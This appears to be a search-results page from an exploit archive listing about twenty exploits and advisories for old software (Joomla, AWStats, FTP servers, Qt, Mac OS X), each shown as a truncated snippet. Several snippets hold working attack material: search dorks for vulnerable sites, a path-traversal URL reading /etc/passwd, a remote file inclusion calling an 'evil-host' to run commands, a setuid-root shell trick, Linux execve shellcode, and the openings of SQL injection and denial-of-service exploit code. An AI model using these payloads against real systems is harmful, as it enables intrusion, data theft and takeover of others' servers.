143 matches found
NASA Ames Research Center BigView 1.8 - '.PNM' Stack Buffer Overflow (PoC)
source: https://www.securityfocus.com/bid/29517/info NASA Ames Research Center BigView is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. An attacker can exploit th...
Joomla! Component Filiale 1.0.4 - 'idFiliale' SQL Injection
Joomla Component Filiale SQL Injection M a f i a C R E W Vulnerability found by: Str0xo Mafia Crew Contact: x02athotmail.de Website: http://www.dz-h4ck3rz.com special tnx to: co2 Greetings: lina-no promises & HIs0k4 ScriptName : 'Joomla' ModuleName : 'Filiale' Version : 1.0.4 DORK 1 :...
mwopen-sql.txt
Http://www.inj3ct-it.org Staffatinj3ct-itdotorg MWOpen...
ynp-lfi.txt
YNP Portal System 2.2.0 showpage.cgi p Remote File Disclosure Vulnerability D0RK : inurl:"showpage.cgi?p=popsearch.html" : inurl:"showpage.cgi?p=support.html" : inurl:"showpage.cgi?p=dialup.html" : inurl:"showpage.cgi?p=" POC: http://xxxx.com/showpage.cgi?p=../../../../../../etc/passwd Discovered...
Rigter Portal System (RPS) 6.2 - Blind SQL Injection
? //RPS 6.2 SQL Injection Exploit //http://www.rps-project.com/ //Need magic_quotes_gpc = Off; //by s0cratex //Contact: s0cratexathotmaildotcom //Salu2: rgod, 0pt1x 'n mechas. error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); $host = "localhost"; $path="/rps"; $id=1; echo...
BlogPHP 1.0 - index.php SQL Injection
source: https://www.securityfocus.com/bid/16269/info BlogPHP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could...
WhitSoft Development SlimFTPd 3.17 - Remote Denial of Service
// source: https://www.securityfocus.com/bid/14723/info SlimFTPd is prone to a remote denial of service vulnerability. This issue is due to a failure in the application to handle exceptional conditions. The problem presents itself duri...
Hosting Controller 0.6.1 - User Registration (1)
Domain: Username: INP...
AWStats 6.4 - Denial of Service
#!/usr/bin/perl Summarized the advisory www.ghc.ru GHC: /str0ke 0 Exploitable example raw log plugin: Attacker can read sensitive information http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog 1 Perl code execution. This script...
-= Unl0ck Team Security Advisory =-
... the best way of protection is attack http://unl0ck.void.ru Advisory : 10 by unl0ck team Product : WinRAR = 3.41 Vendor : http://rarlabs.com Date :...
Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Bash)
Apple Mac OSX Adobe Version Cue - Local Privilege Escalation Bash Proof of concept: haven: fintler$ cd haven: fintler$ id uid=502fintler gid=500fintler groups=500fintler haven: fintler$ echo "cp /bin/sh /Users/$USER;chmod 4755 /Users/$USER/sh;chown root /Users/$USER/sh" productname.sh haven:...
MS Internet Explorer 6.0 SP2 File Download Security Warning Bypass
Exploit for unknown platform in category remote exploits. Original Advisory and exploit by...
linux/x86 execve code 23 bytes
linux/x86 execve code 23 bytes. Shellcode exploit for linx86 platform / Linux 23 byte execve code. Greetz to preedator marcetam admin at marcetam.net / char linux= "\x99" / cdq / "\x52" / push %edx / "\x68\x2f\x2f\x73\x68" / push $0x68732f2f / "\x68\x2f\x62\x69\x6e" / push $0x6e69622f / "\x89\xe3...
Master of Orion III <= 1.2.5 Denial of Service Exploit
No description provided by source. /* by Luigi Auriemma */ #include <stdio.h> #include <stdlib.h> #include <string.h> #ifdef WIN32 #include <winsock.h> /* Header file used for manage errors in Windows It support socket and errno too this header replace the previous sockerrX.h */ #include <string.h> #include <errno.h>...
MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow Exploit
Exploit for unknown platform in category remote exploits. MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow Advanced, secure...
ocPortal 1.0.3 - Remote File Inclusion
http://localhost/ocp-103/index.php?reqpath=http://evil-host/ On your evil host you must put script funcs.php. Example of funcs.php if your host doesn't support php. Example of funcs.php if your host supports php. '; ? http://localhost/ocp-103/index.php?reqpath=http://evil-host/&com=ls milw0rm.com...
Turbo Seek Null Byte Error Discloses Files to Remote Users
Exploit for cgi platform in category web applications. Some demonstration exploit URLs are provided:...
CesarFTP Server - Long Command Denial of Service
cesarftp.c - Cesar FTP Server Long Command DoS Exploit Copyright (C) 2000-2004 HUC All Rights Reserved. Author : lion : http://www.cnhonker.com Date :...
WFTPD Pro Server 3.21 - MLST Remote Denial of Service
wftpd.c - WFTPD Pro Server 3.21 MLST DoS Exploit Copyright (C) 2000-2004 HUC All Rights Reserved. Author : lion : lion cnhonker net : www cnhonker com Date : 2004-08-30...
Qt - .bmp Parsing Bug Heap Overflow
/ heap overflow exploit for qt bmp parsing bug infamous42md AT hotpop DOT com shouts to mitakeet, MB, and peeps @hackaholic ok, pretty standard heap overflow here. we spill across our chunk and overwrite the boundary tag for next chunk. the only problems i had...